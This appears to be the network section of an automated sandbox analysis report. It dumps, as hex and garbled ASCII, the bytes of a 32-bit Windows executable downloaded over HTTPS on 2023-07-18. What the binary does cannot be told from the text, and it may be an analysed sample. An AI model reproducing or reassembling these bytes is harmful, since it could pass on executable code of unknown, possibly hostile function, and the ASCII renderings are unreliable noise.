                                                                                                                                  Data Ascii: ;D$tV/Y^0G}mSVW3jMuuuueUuKEPsu.YM_^[dSV3jN^^^^^^YY^ ^$^(F,FxG^[0GlQVW3N>ju9yyNj}9yyNj
                                                                                                                                  2023-07-18 15:37:08 UTC2284INData Raw: d8 c1 e3 02 8b 45 08 8b 40 0c 8b 14 18 8b 46 0c 8b 0c b8 e8 94 fe ff ff 84 c0 74 09 47 83 c3 04 3b 7e 08 7c df 8b 56 08 3b fa 74 15 8b 45 0c 40 3b 45 fc 89 45 0c 7e c1 32 c0 5f 5e 5b c9 c2 08 00 b0 01 eb f5 56 57 8b f1 33 ff 39 7e 18 7e 1c 8b 46 1c 8b 54 24 0c 8b 04 b8 8d 48 04 e8 c8 fc ff ff 85 c0 74 0e 47 3b 7e 18 7c e4 83 c8 ff 5f 5e c2 04 00 8b c7 eb f7 80 7c 24 04 00 ff 74 24 08 74 05 83 c1 24 eb 03 83 c1 38 e8 48 08 00 00 c2 08 00 b8 5c 38 47 00 e8 01 2d 06 00 83 ec 4c 53 56 57 8b 7d 0c 8b f1 8b 47 08 83 f8 01 7e 5f 8b 47 0c 8b 18 8b cb 89 5d 0c e8 8a fe ff ff 84 c0 75 4c 53 8b ce e8 7a ff ff ff 8b d8 85 db 7d 27 56 8d 4d a8 ff 75 0c e8 4e 00 00 00 83 65 fc 00 50 8d 4e 10 e8 6e 07 00 00 83 4d fc ff 8d 4d a8 8b d8 e8 90 cc ff ff 8b 07 6a 01 6a 00 8b
                                                                                                                                  Data Ascii: E@FtG;~|V;tE@;EE~2_^[VW39~~FT$HtG;~|_^|$t$t$8H\8G-LSVW}G~_G]uLSz}'VMuNePNnMMjj
                                                                                                                                  2023-07-18 15:37:08 UTC2300INData Raw: 57 e8 14 30 00 00 85 c0 89 46 08 74 08 33 c0 eb 0d 83 66 08 00 01 7e 10 8b c7 83 56 14 00 5f 5e c2 04 00 83 e9 00 74 2c 49 74 25 49 74 1c 83 e9 03 74 11 83 e9 05 74 06 b8 05 40 00 80 c3 b8 04 40 00 80 c3 b8 57 00 07 80 c3 b8 0e 00 07 80 c3 6a 01 58 c3 33 c0 c3 8b c1 8b 4c 24 04 83 60 0c 00 89 48 08 c7 00 66 cb 40 00 c7 40 04 ac cb 40 00 c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b f1 b8 00 00 00 80 8b 0f 3b c8 89 4d 08 72 03 89 45 08 8b 46 08 8d 5d 08 53 ff 75 08 8b 08 52 50 ff 51 0c 89 46 0c 8b 45 08 89 07 8b 46 0c f7 d8 1b c0 5f 5e 83 e0 08 5b 5d c2 04 00 55 8b ec 51 51 8b 45 08 56 57 8b f9 33 c9 8b f2 2b c1 74 12 48 74 0c 48 74 05 6a 05 58 eb 34 6a 02 eb 02 6a 01 59 53 8b 47 08 8d 5d f8 8b 10 53 51 ff 76 04 ff 36 50 ff 52 10 89 47 0c 8b 45 f8 89 06 8b 45 fc
                                                                                                                                  Data Ascii: W0Ft3f~V_^t,It%Ittt@@WjX3L$`Hf@@@USVW};MrEF]SuRPQFEF_^[]UQQEVW3+tHtHtjX4jjYSG]SQv6PRGEE
                                                                                                                                  2023-07-18 15:37:08 UTC2316INData Raw: ff 75 fc 8b cf 56 ff 75 08 e8 8d 84 ff ff 5f 5e c9 c2 08 00 b8 ac 41 47 00 e8 80 ad 05 00 83 ec 1c 53 56 57 8b 7d 08 8b d9 6a 01 8b 47 08 89 55 f0 3b c3 5e 75 34 80 7d 10 00 75 2e ff 35 18 ba 48 00 8d 4d e4 e8 f6 29 ff ff ff 75 0c 8b 4d f0 83 65 fc 00 8d 55 e4 56 e8 7a ff ff ff 83 4d fc ff ff 75 e4 e8 bd 6e ff ff 59 3b 5f 08 7d 6a 8b 47 0c 8b 0c 98 83 79 04 00 74 48 8b 01 66 83 38 40 75 2f 8d 45 d8 56 50 e8 4a 67 ff ff ff 75 14 8b 00 8b 4d f0 8b d0 ff 75 0c 89 75 fc 56 e8 47 00 00 00 83 4d fc ff ff 75 d8 e8 77 6e ff ff 59 eb 0e ff 75 0c 8b d1 8b 4d f0 56 e8 17 ff ff ff 43 eb a7 a1 38 ba 48 00 68 58 d3 47 00 89 45 10 8d 45 10 50 e8 29 ad 05 00 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 b8 c8 41 47 00 e8 aa ac 05 00 83 ec 18 53 56 57 33 f6 bf 20 a4
                                                                                                                                  Data Ascii: uVu_^AGSVW}jGU;^u4}u.5HM)uMeUVzMunY;_}jGytHf8@u/EVPJguMuuVGMuwnYuMVC8HhXGEEP)M_^[dAGSVW3
                                                                                                                                  2023-07-18 15:37:08 UTC2332INData Raw: 00 60 00 8b c3 8b de 8b f2 55 99 6a 03 03 d8 55 57 13 f2 e8 66 68 05 00 6a 01 59 e8 ce 67 05 00 03 d8 13 f2 5f 8b d6 5e 8b c3 5d 5b 59 c3 53 8a 5c 24 08 56 8b f1 f6 c3 02 74 24 57 8d 7e fc 68 b4 29 44 00 ff 37 6a 18 56 e8 27 73 05 00 f6 c3 01 74 07 57 e8 cd 2e ff ff 59 8b c7 5f eb 15 8b ce e8 5c de 02 00 f6 c3 01 74 07 56 e8 b5 2e ff ff 59 8b c6 5e 5b c2 04 00 b8 80 47 47 00 e8 1b 6d 05 00 83 ec 1c 53 33 db 56 57 89 5d e0 c7 45 d8 cc aa 47 00 68 00 05 00 00 8d 4d d8 89 5d fc e8 88 f0 ff ff 84 c0 0f 84 80 00 00 00 8b 75 e0 33 c0 ba 00 01 00 00 88 04 30 40 3b c2 72 f8 8b ce e8 8b 00 00 00 3d 73 8c 05 29 75 60 8d 45 e4 ba 00 04 00 00 50 8d 8e 00 01 00 00 c7 45 e4 e5 55 9a 15 c7 45 e8 b5 3b 12 1f e8 93 00 00 00 89 5d ec 8b 45 ec 83 65 f0 00 8d 3c 30 8b 55 f0
                                                                                                                                  Data Ascii: `UjUWfhjYg_^][YS\$Vt$W~h)D7jV'stW.Y_\tV.Y^[GGmS3VW]EGhM]u30@;r=s)u`EPEUE;]Ee<0U
                                                                                                                                  2023-07-18 15:37:08 UTC2348INData Raw: ff 75 d0 8b f0 e8 1c ef fe ff ff 75 dc e8 14 ef fe ff ff 75 c4 e8 0c ef fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b c6 e9 65 01 00 00 ff 75 1c 8d 45 b8 8d 4d c4 50 e8 63 e8 fe ff 50 8d 4d dc c6 45 fc 05 e8 e3 92 fe ff ff 75 b8 c6 45 fc 04 e8 c9 ee fe ff 59 8d 45 b8 ff 75 1c 8d 4d c4 50 e8 6a e7 fe ff 50 8d 4d d0 c6 45 fc 06 e8 ba 92 fe ff ff 75 b8 c6 45 fc 04 e8 a0 ee fe ff 59 8d 45 d0 50 8d 45 dc 50 8b ce e8 a5 02 00 00 eb 10 8b 45 18 8b 56 08 8b 08 8d 46 08 51 50 ff 52 0c ff 75 f0 8b cf ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a1 f9 ff ff 3b c3 89 45 18 74 34 ff 75 d0 e8 56 ee fe ff ff 75 dc e8 4e ee fe ff ff 75 c4 e8 46 ee fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b 45 18 e9 9e 00 00 00 8d 45 d0
                                                                                                                                  Data Ascii: uuuEM;tPQeuEMPcPMEuEYEuMPjPMEuEYEPEPEVFQPRuuuuuu;Et4uVuNuFEM;tPQEE
                                                                                                                                  2023-07-18 15:37:08 UTC2364INData Raw: 74 07 8b 10 51 8b c8 ff 12 ff 45 f8 83 45 fc 0c 8b 45 f8 3b 43 08 0f 8c 77 ff ff ff 8b 4d 08 e8 1a bc fe ff 5f 5e 5b c9 c2 08 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 f0 8d 45 f0 50 e8 c1 ed 04 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 ec 8d 45 ec 50 e8 ab ed 04 00 8b 44 24 08 83 f8 01 72 07 b8 57 00 07 80 eb 2b 8b 54 24 10 8d 04 40 8b 0c 85 1c c4 48 00 8d 04 85 18 c4 48 00 89 0a 8b 4c 24 14 66 8b 40 08 66 89 01 8b 44 24 0c 83 20 00 33 c0 c2 14 00 b8 28 56 47 00 e8 ff ec 04 00 83 ec 10 33 c9 66 89 4d e4 66 89 4d e6 83 7d 0c 2c 89 4d fc 75 16 8b 45 08 38 48 30 74 0e ff 70 24 8d 4d e4 ff 70 20 e8 03 f6 fe ff ff 75 10 8d 4d e4 e8 ea f6 fe ff 83 4d fc ff 8d 4d e4 e8 3b f6 fe ff 8b 4d f4 33 c0 64 89 0d 00 00 00 00 c9 c2 0c 00 b8 3c 56 47 00 e8 a2 ec 04 00 83 ec 10
                                                                                                                                  Data Ascii: tQEEE;CwM_^[HhXGEEPHhXGEEPD$rW+T$@HHL$f@fD$ 3(VG3fMfM},MuE8H0tp$Mp uMMM;M3d<VG
                                                                                                                                  2023-07-18 15:37:08 UTC2380INData Raw: eb 12 48 48 e9 9d f8 ff ff b8 01 0b 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 b8 4c 5c 47 00 e8 6f ad 04 00 83 ec 34 53 56 8b f1 57 33 db 6a 03 8d 4d e4 89 5d f0 89 5d e4 89 5d e8 89 5d ec e8 59 13 fe ff 38 5e 18 8b 7e 10 89 5d fc 0f 84 4b 01 00 00 89 7d f0 4f 3b fb 7c 66 8b 46 0c 66 8b 1c 78 66 83 fb 7a 75 26 8d 45 e4 66 ba 61 00 50 8d 4d d8 e8 de 0b 00 00 50 8d 4d e4 c6 45 fc 01 e8 a4 12 fe ff 80 65 fc 00 ff 75 d8 eb 2a 66 83 fb 5a 75 63 8d 45 e4 66 ba 41 00 50 8d 4d cc e8 b2 0b 00 00 50 8d 4d e4 c6 45 fc 02 e8 78 12 fe ff 80 65 fc 00 ff 75 cc e8 5e 6e fe ff 4f 59 79 9a 8d 7e 0c 8d 45 e4 50 8b cf e8 5a 12 fe ff 8b 4d 08 57 8b d6 e8 c9 a4 fe ff ff 75 e4 e8 39 6e fe ff 8b 45 08 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9
                                                                                                                                  Data Ascii: HHBM_^d[L\Go4SVW3jM]]]]Y8^~]K}O;|fFfxfzu&EfaPMPMEeu*fZucEfAPMPMExeu^nOYy~EPZMWu9nEYM_^[d
                                                                                                                                  2023-07-18 15:37:08 UTC2396INData Raw: 00 a1 8c c9 48 00 a3 cc 0c 49 00 c3 8b 15 8c c9 48 00 56 8d 71 14 8b ce e8 1e 00 00 00 84 c0 75 15 8b 15 90 c9 48 00 8b ce e8 0d 00 00 00 84 c0 75 04 33 c0 5e c3 6a 01 58 5e c3 8b 09 e8 46 35 fe ff f7 d8 1b c0 40 c3 b8 80 64 47 00 e8 4c 6d 04 00 83 ec 24 53 56 8b 71 3c 57 8b 7d 08 83 7f 18 00 75 0e ff 35 cc 0c 49 00 8d 4f 14 e8 2f ea fd ff 8b cf e8 93 ff ff ff 84 c0 0f 84 42 01 00 00 83 fe 09 72 07 b8 00 00 00 04 eb 27 83 fe 07 72 07 b8 00 00 00 02 eb 1b 83 fe 05 72 07 b8 00 00 00 01 eb 0f 83 fe 03 1b c0 25 00 00 f1 ff 05 00 00 10 00 83 fe 05 8b 0d a8 c9 48 00 1b db 43 83 fe 07 1b ff 83 e7 e0 83 c7 40 83 fe 05 73 06 8b 0d a4 c9 48 00 66 83 65 e2 00 89 4d f0 66 c7 45 e0 13 00 89 45 e8 8b 4d 08 83 65 fc 00 8d 45 e0 50 6a 01 5a e8 69 03 00 00 83 ce ff 8d 4d
                                                                                                                                  Data Ascii: HIHVquHu3^jX^F5@dGLm$SVq<W}u5IO/Br'rr%HC@sHfeMfEEMeEPjZiM
                                                                                                                                  2023-07-18 15:37:08 UTC2412INData Raw: 6b 47 00 e8 96 2d 04 00 51 56 8b f1 89 75 f0 8d 8e 94 00 00 00 c7 45 fc 03 00 00 00 e8 f1 fa fd ff 8d 4e 7c c6 45 fc 02 e8 e5 fa fd ff 8d 4e 68 c6 45 fc 01 e8 d9 fa fd ff 80 65 fc 00 8d 4e 54 e8 cd fa fd ff 83 4d fc ff 8d 4e 04 e8 f2 aa ff ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 8b c1 83 60 04 00 83 60 08 00 c7 00 ec a7 47 00 c3 8b c1 33 c9 89 48 04 89 48 08 89 48 0c c7 40 10 04 00 00 00 c7 00 78 b1 47 00 c3 b8 9c 6b 47 00 e8 0a 2d 04 00 51 56 8b f1 89 75 f0 c7 06 00 b3 47 00 83 65 fc 00 e8 91 fa fd ff 83 4d fc ff 8b ce e8 5d fa fd ff 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 b8 b2 6b 47 00 e8 d2 2c 04 00 51 56 8b f1 6a 28 e8 29 ee fd ff 59 8b c8 89 4d f0 33 c0 3b c8 89 45 fc 74 08 ff 75 08 e8 e2 02 00 00 83 4d fc ff 50 8b ce e8 81 d0 fe ff 8b 4d f4 5e 64
                                                                                                                                  Data Ascii: kG-QVuEN|ENhEeNTMNM^d``G3HHH@xGkG-QVuGeM]M^dkG,QVj()YM3;EtuMPM^d
                                                                                                                                  2023-07-18 15:37:08 UTC2428INData Raw: 65 fc 00 e8 1e af fd ff 8b 75 08 59 eb 2a 50 51 8d 4e 0c e8 c4 8b ff ff 85 c0 74 0f 8b f0 ff 75 e4 e8 00 af fd ff 59 8b c6 eb 22 ff 75 e4 80 65 fc 00 e8 ef ae fd ff 59 43 e9 46 ff ff ff 33 c0 eb 0b b8 3a cb 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 56 8b f2 57 8b f9 8d 46 0c 8d 56 08 50 e8 3e 00 00 00 85 c0 75 37 8b 07 66 83 38 3a 74 07 b8 57 00 07 80 eb 28 6a 01 6a 00 8b cf e8 25 aa fd ff 8d 46 04 8b d6 50 8b cf e8 13 00 00 00 85 c0 75 0c 8b 47 04 f7 d8 1b c0 25 57 00 07 80 5f 5e c3 56 57 8b 7c 24 0c 8b f1 83 27 00 e8 0a 98 ff ff 85 c0 74 2a 50 6a 00 8b ce e8 e7 a9 fd ff 8b 06 66 83 38 53 75 29 6a 01 6a 00 8b ce e8 d4 a9 fd ff 8b d7 8b ce e8 e0 97 ff ff 85 c0 75 07 b8 57 00 07 80 eb 0c 50 6a 00 8b ce e8 b6 a9 fd ff 33 c0
                                                                                                                                  Data Ascii: euY*PQNtuY"ueYCF3:BM_^d[VWFVP>u7f8:tW(jj%FPuG%W_^VW|$'t*Pjf8Su)jjuWPj3
                                                                                                                                  2023-07-18 15:37:08 UTC2444INData Raw: 24 0c 8b f1 3b 7e 1c 7c 13 53 8d 5e 14 6a 00 8b cb e8 27 a1 00 00 3b 7e 1c 7d f2 5b 8b 4e 20 8a 44 24 10 84 c0 88 04 39 74 24 3b 7e 08 7c 0d 6a 00 6a 00 8b ce e8 73 2d ff ff eb ee 8b 46 0c 8b 4c 24 14 89 0c f8 8b 4c 24 18 89 4c f8 04 5f 5e c2 10 00 b8 48 78 47 00 e8 41 ad 03 00 83 ec 14 56 57 8b f9 8d b7 58 02 00 00 8b ce e8 ca 7a fd ff 81 c7 c8 01 00 00 8d 4d e0 57 e8 2f 3b ff ff 6a 0e 33 ff 5a 8d 4d e0 89 7d fc e8 3f 01 00 00 6a 0f 8d 4d e0 5a e8 34 01 00 00 6a 11 8b d6 8d 4d e0 e8 d7 00 00 00 6a 10 8b d6 8d 4d e0 e8 cb 00 00 00 6a 09 8b d6 8d 4d e0 e8 bf 00 00 00 6a 06 8b d6 8d 4d e0 e8 b3 00 00 00 6a 12 8b d6 8d 4d e0 e8 a7 00 00 00 6a 14 8b d6 8d 4d e0 e8 9b 00 00 00 6a 13 8b d6 8d 4d e0 e8 8f 00 00 00 6a 15 8b d6 8d 4d e0 e8 83 00 00 00 6a 0a 8b d6
                                                                                                                                  Data Ascii: $;~|S^j';~}[N D$9t$;~|jjs-FL$L$L_^HxGAVWXzMW/;j3ZM}?jMZ4jMjMjMjMjMjMjMjMj
                                                                                                                                  2023-07-18 15:37:08 UTC2460INData Raw: 3b c3 0f 85 3f 01 00 00 39 5e 18 74 65 8b ce e8 8f fc ff ff ff 46 28 8b f8 3b fb c6 46 39 01 75 1c 8b 4e 34 3b cb 74 15 8b 56 10 3b d3 74 0e 8b 46 48 2b 46 20 50 e8 df af fd ff 8b f8 39 5e 10 75 16 80 7e 1c 00 74 10 39 5e 34 74 0b 6a 01 8b ce e8 0f fc ff ff eb 07 8b ce e8 32 fc ff ff 3b c3 0f 85 e0 00 00 00 3b fb 74 9d 8b c7 e9 d5 00 00 00 80 66 1c 00 83 7d ec 00 0f 87 b3 00 00 00 8b 5d 10 e9 d1 fe ff ff 8b 46 0c 8b 4e 28 8b 40 08 3b c8 7d 3a 8b 46 08 8b 56 24 03 d1 33 ff 8b 48 20 8b 40 0c 8d 0c d1 8b 11 8b 49 04 8b 04 90 8b 56 48 8b 40 70 8b 04 88 8b 48 10 89 4e 3c 8b 4e 4c 8b 40 0c 3b f9 77 17 72 04 3b c2 73 07 b8 05 40 00 80 eb 71 3b f9 72 2c 77 04 3b c2 76 26 8b c8 2b 4e 48 3b 4d 0c 72 03 8b 4d 0c 01 4d ec 85 db 74 05 8b 55 ec 89 13 01 4d 08 29 4d 0c
                                                                                                                                  Data Ascii: ;?9^teF(;F9uN4;tV;tFH+F P9^u~t9^4tj2;;tf}]FN(@;}:FV$3H @IVH@pHN<NL@;wr;s@q;r,w;v&+NH;MrMMtUM)M
                                                                                                                                  2023-07-18 15:37:08 UTC2476INData Raw: e8 7a 03 00 00 8d 46 18 8d 8d 18 fe ff ff 50 6a 08 5b 8b d3 e8 1e 03 00 00 84 c0 0f 84 c9 01 00 00 8d 7e 1c 8b d3 57 8d 8d 20 fe ff ff e8 05 03 00 00 84 c0 75 03 83 27 00 8d 7e 20 8b d3 57 8d 8d 28 fe ff ff e8 ed 02 00 00 84 c0 75 03 83 27 00 0f b6 85 30 fe ff ff 0f b6 8d 31 fe ff ff c1 e0 08 0b c1 0f b6 8d 32 fe ff ff c1 e0 08 0b c1 0f b6 8d 33 fe ff ff c1 e0 08 0b c1 3d 00 00 00 80 8d 46 10 89 45 0c 75 6a 0f b6 85 34 fe ff ff 0f b6 8d 35 fe ff ff c1 e0 08 0b c1 0f b6 8d 36 fe ff ff c1 e0 08 0b c1 0f b6 8d 37 fe ff ff 0f b6 bd 39 fe ff ff c1 e0 08 0b c1 33 c9 8b d0 0f b6 85 38 fe ff ff c1 e0 08 0b c7 0f b6 bd 3a fe ff ff c1 e0 08 0b c7 0f b6 bd 3b fe ff ff c1 e0 08 0b c7 33 ff 0b c8 8b 45 0c 0b d7 89 08 89 50 04 eb 17 50 6a 0c 5a 8d 8d 30 fe ff ff e8 df
                                                                                                                                  Data Ascii: zFPj[~W u'~ W(u'0123=FEuj4567938:;3EPPjZ0
                                                                                                                                  2023-07-18 15:37:08 UTC2492INData Raw: 65 fc 00 8d 4d 80 e8 56 00 00 00 33 c0 eb 0b b8 07 cb 43 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 14 00 8b c1 33 c9 89 08 89 48 04 89 48 08 89 48 0c 89 48 10 89 48 14 89 48 18 89 48 1c 89 48 20 89 48 28 89 48 2c 89 48 30 c7 40 34 04 00 00 00 c7 40 24 30 b8 47 00 c3 b8 a7 87 47 00 e8 33 ed 02 00 51 51 56 8b f1 57 89 75 f0 83 65 fc 00 8d 7e 24 89 7d ec c7 07 30 b8 47 00 8b cf c6 45 fc 05 e8 ac ba fc ff 8b cf c6 45 fc 04 e8 78 ba fc ff 8b 46 20 c6 45 fc 03 85 c0 74 06 8b 08 50 ff 51 08 8b 46 1c c6 45 fc 02 85 c0 74 06 8b 08 50 ff 51 08 8b 46 14 c6 45 fc 01 85 c0 74 06 8b 08 50 ff 51 08 8b 46 10 80 65 fc 00 85 c0 74 06 8b 08 50 ff 51 08 8b 76 0c 83 4d fc ff 85 f6 74 06 8b 06 56 ff 50 08 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 c9 c3 e9 53
                                                                                                                                  Data Ascii: eMV3CM_^d[3HHHHHHHH H(H,H0@4@$0GG3QQVWue~$}0GEExF EtPQFEtPQFEtPQFetPQvMtVPM_^dS
                                                                                                                                  2023-07-18 15:37:08 UTC2508INData Raw: e8 fe fc ff ff 8a 46 40 8b cf 50 e8 c1 fc ff ff 8a 46 41 8b cf 50 e8 b6 fc ff ff 8a 06 80 7d fd 00 88 45 f8 74 08 3c 2d 73 04 c6 45 f8 2d ff 75 f8 8b cf e8 99 fc ff ff 8a 46 01 8b cf 50 e8 8e fc ff ff 66 8b 46 02 8b cf 50 e8 91 fc ff ff 66 8b 46 04 8b cf 50 e8 85 fc ff ff ff 76 08 8b cf e8 9e fc ff ff ff 76 0c 8b cf e8 94 fc ff ff 80 7d ff 00 74 05 83 c8 ff eb 03 8b 46 10 50 8b cf e8 7e fc ff ff 80 7d 0b 00 74 05 83 c8 ff eb 03 8b 46 18 53 50 8b cf e8 67 fc ff ff ff 76 24 8b cf e8 3a fc ff ff 8a 5d fe 8a 45 ff f6 db 1b db 83 e3 08 f6 d8 1b c0 83 e0 08 03 d8 8a 45 0b f6 d8 1b c0 83 e0 08 03 d8 8a 45 fd f6 d8 8d 4b 04 1b c0 23 c1 8a 8e 8a 00 00 00 f6 d9 1b c9 83 e1 24 03 c1 8d 4e 68 89 45 f8 e8 83 fe ff ff 01 45 f8 8b cf ff 75 f8 e8 e5 fb ff ff ff b6 80 00
                                                                                                                                  Data Ascii: F@PFAP}Et<-sE-uFPfFPfFPvv}tFP~}tFSPgv$:]EEEK#$NhEEu
                                                                                                                                  2023-07-18 15:37:08 UTC2524INData Raw: 4e 24 c7 44 24 78 ff ff ff ff e8 6b 32 ff ff 8d 4e 4c e8 63 32 ff ff 8d 4e 74 e8 5b 32 ff ff 8b 86 b4 00 00 00 85 c0 74 10 8b 10 50 ff 52 08 c7 86 b4 00 00 00 00 00 00 00 8b c7 e9 c9 00 00 00 8b 44 24 14 c6 44 24 78 00 85 c0 74 06 8b 08 50 ff 51 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8d 4e 24 e8 13 32 ff ff 8d 4e 4c e8 0b 32 ff ff 8b 46 74 33 db 3b c3 74 09 8b 10 50 ff 52 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 0c 8b 08 50 ff 51 08 89 9e b4 00 00 00 8b c7 eb 6e 8b 44 24 14 c6 44 24 78 00 3b c3 74 06 8b 10 50 ff 52 08 8b 74 24 10 c7 44 24 78 ff ff ff ff 8b 46 24 3b c3 74 09 8b 08 50 ff 51 08 89 5e 24 8b 46 4c 3b c3 74 09 8b 10 50 ff 52 08 89 5e 4c 8b 46 74 3b c3 74 09 8b 08 50 ff 51 08 89 5e 74 8b 86 b4 00 00 00 3b c3 74 a3 8b 10 50 ff 52 08 89 9e b4 00 00
                                                                                                                                  Data Ascii: N$D$xk2NLc2Nt[2tPRD$D$xtPQt$D$xN$2NL2Ft3;tPR^t;tPQnD$D$x;tPRt$D$xF$;tPQ^$FL;tPR^LFt;tPQ^t;tPR
                                                                                                                                  2023-07-18 15:37:08 UTC2540INData Raw: 9c 70 02 00 00 8b 2a 83 c2 04 03 cd 46 3b c8 72 f4 8d 6e ff 3b eb 7e 20 3b 7c 24 18 74 1a 83 ff 01 74 15 8b 54 24 10 83 e2 01 80 fa 01 75 09 8b f5 2b 8c b4 70 02 00 00 8b 6c 24 24 33 c0 3b c3 7c 08 3b c6 7d 04 33 d2 eb 05 ba 01 00 00 00 88 14 28 8b 54 24 38 40 3b c2 7c e3 8b 44 24 1c 8b de 8b 74 24 10 2b c1 4f 46 81 ed 02 01 00 00 89 44 24 1c 85 ff 89 74 24 10 89 6c 24 24 0f 85 6f ff ff ff 8b 6c 24 54 c7 44 24 28 04 00 00 00 8b 5c 24 18 33 d2 8d b5 20 06 00 00 33 c0 8b fe 42 b9 02 01 00 00 81 c6 08 04 00 00 3b d3 f3 ab 7c ea 33 c9 8d 85 80 36 00 00 89 4c 24 34 89 44 24 1c 8b 54 24 3c 33 ff 8d 74 24 70 33 c0 8a 04 11 41 3d ff 00 00 00 72 08 33 db 8a 1c 11 03 c3 41 89 06 47 83 c6 04 83 ff 32 7d 06 3b 4c 24 20 72 da 89 4c 24 30 c7 44 24 24 ff ff ff ff c7 44
                                                                                                                                  Data Ascii: p*F;rn;~ ;|$ttT$u+pl$$3;|;}3(T$8@;|D$t$+OFD$t$l$$ol$TD$(\$3 3B;|36L$4D$T$<3t$p3A=r3AG2};L$ rL$0D$$D
                                                                                                                                  2023-07-18 15:37:08 UTC2556INData Raw: 8b c2 89 56 04 3b c1 75 07 8b ce e8 bb 24 fc ff 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 e9 78 02 00 00 25 ff ff 00 00 33 d2 33 c9 89 44 24 14 8a 90 f0 13 49 00 8d b5 70 04 00 00 89 54 24 1c 8a 8c 2a 3d 08 00 00 8b 9c 95 80 11 00 00 8b f9 85 ff 76 7d 8b 46 28 3b f8 72 4b b9 08 00 00 00 2b f8 2b c8 8a c3 8b 2e d2 e0 8a 4e 2c 0a c1 8b 4e 04 88 04 29 8b 6e 04 8b 4e 08 45 8b c5 89 6e 04 3b c1 75 0b 8b ce e8 39 24 fc ff 8b 54 24 1c 8b 4e 28 c7 46 28 08 00 00 00 d3 eb 85 ff c6 46 2c 00 77 b0 eb 23 8b 6e 28 b0 01 8b cf d2 e0 b9 08 00 00 00 2b cd fe c8 22 c3 d2 e0 8a 4e 2c 0a c8 2b ef 88 4e 2c 89 6e 28 8b 44 24 14 8b 6c 24 10 8b 8d e0 04 00 00 33 db 8a 1c 11 8b 8d dc 04 00 00 8b fb 33 db 8a 1c 11 2b c3 85 ff 8b d8 76 71 8b 46 28 3b f8 72 47 b9
                                                                                                                                  Data Ascii: V;u$N(F(F,wx%33D$IpT$*=v}F(;rK++.N,N)nNEn;u9$T$N(F(F,w#n(+"N,+N,n(D$l$33+vqF(;rG
                                                                                                                                  2023-07-18 15:37:08 UTC2572INData Raw: 00 00 00 00 5e c3 90 90 90 90 90 90 90 90 56 8b 74 24 08 8d 4e 30 e8 94 e4 fb ff 85 c0 75 0b 8b 8e ac 1c 00 00 e8 c4 fc ff ff 5e c2 04 00 51 8b 41 2c 56 8d 71 08 8b 54 24 0c b9 0f 00 00 00 57 8b 7e 20 2b c8 d3 ef b9 11 00 00 00 03 c2 2b ca 89 46 24 81 e7 ff ff 01 00 d3 ef 83 f8 10 72 72 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 0e d5 fb ff 88 44 24 08 eb 09 8a 08 40 88 4c 24 08 89 06 8b 06 8b 4e 04 3b c1 72 0d 8b ce e8 ef d4 fb ff 88 44 24 10 eb 09 8a 10 40 88 54 24 10 89 06 8b 46 20 8b 4c 24 10 8b 54 24 08 81 e1 ff 00 00 00 c1 e0 08 0b c1 8b 4e 24 c1 e0 08 81 e2 ff 00 00 00 83 c1 f0 0b c2 89 4e 24 89 46 20 8b c1 83 f8 10 73 8e 8b c7 5f 5e 59 c2 04 00 90 90 90 90 81 ec b4 00 00 00 53 55 56 33 db 57 8b e9 33 f6 6a 04 8b cd e8 37 ff ff ff 88 44 34 28 46 83 fe 14
                                                                                                                                  Data Ascii: ^Vt$N0u^QA,VqT$W~ ++F$rrN;rD$@L$N;rD$@T$F L$T$N$N$F s_^YSUV3W3j7D4(F
                                                                                                                                  2023-07-18 15:37:08 UTC2588INData Raw: 90 b1 47 00 c7 41 04 80 b1 47 00 e9 ae ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 6a ff 68 9e 9b 47 00 64 a1 00 00 00 00 50 64 89 25 00 00 00 00 81 ec 94 00 00 00 53 55 8b e9 56 57 8d 4c 24 1c e8 48 94 fb ff 33 ff 89 bc 24 ac 00 00 00 89 7c 24 40 89 7c 24 44 89 7c 24 54 89 7c 24 60 68 00 00 10 00 8d 4c 24 20 c6 84 24 b0 00 00 00 01 e8 2c 94 fb ff 84 c0 75 62 8d 4c 24 40 c6 84 24 ac 00 00 00 02 e8 34 a3 fb ff 8b 44 24 54 c6 84 24 ac 00 00 00 00 3b c7 74 06 8b 08 50 ff 51 08 8d 4c 24 1c c7 84 24 ac 00 00 00 03 00 00 00 e8 2b 94 fb ff 8b 44 24 28 c7 84 24 ac 00 00 00 ff ff ff ff 3b c7 0f 84 90 00 00 00 8b 10 50 ff 52 08 b8 0e 00 07 80 e9 26 06 00 00 8b 84 24 b4 00 00 00 8d 4c 24 1c 50 e8 04 94 fb ff 8d 4c 24 1c e8 0a 94 fb ff 68 00 00 10 00 8d 4c 24
                                                                                                                                  Data Ascii: GAGjhGdPd%SUVWL$H3$|$@|$D|$T|$`hL$ $,ubL$@$4D$T$;tPQL$$+D$($;PR&$L$PL$hL$
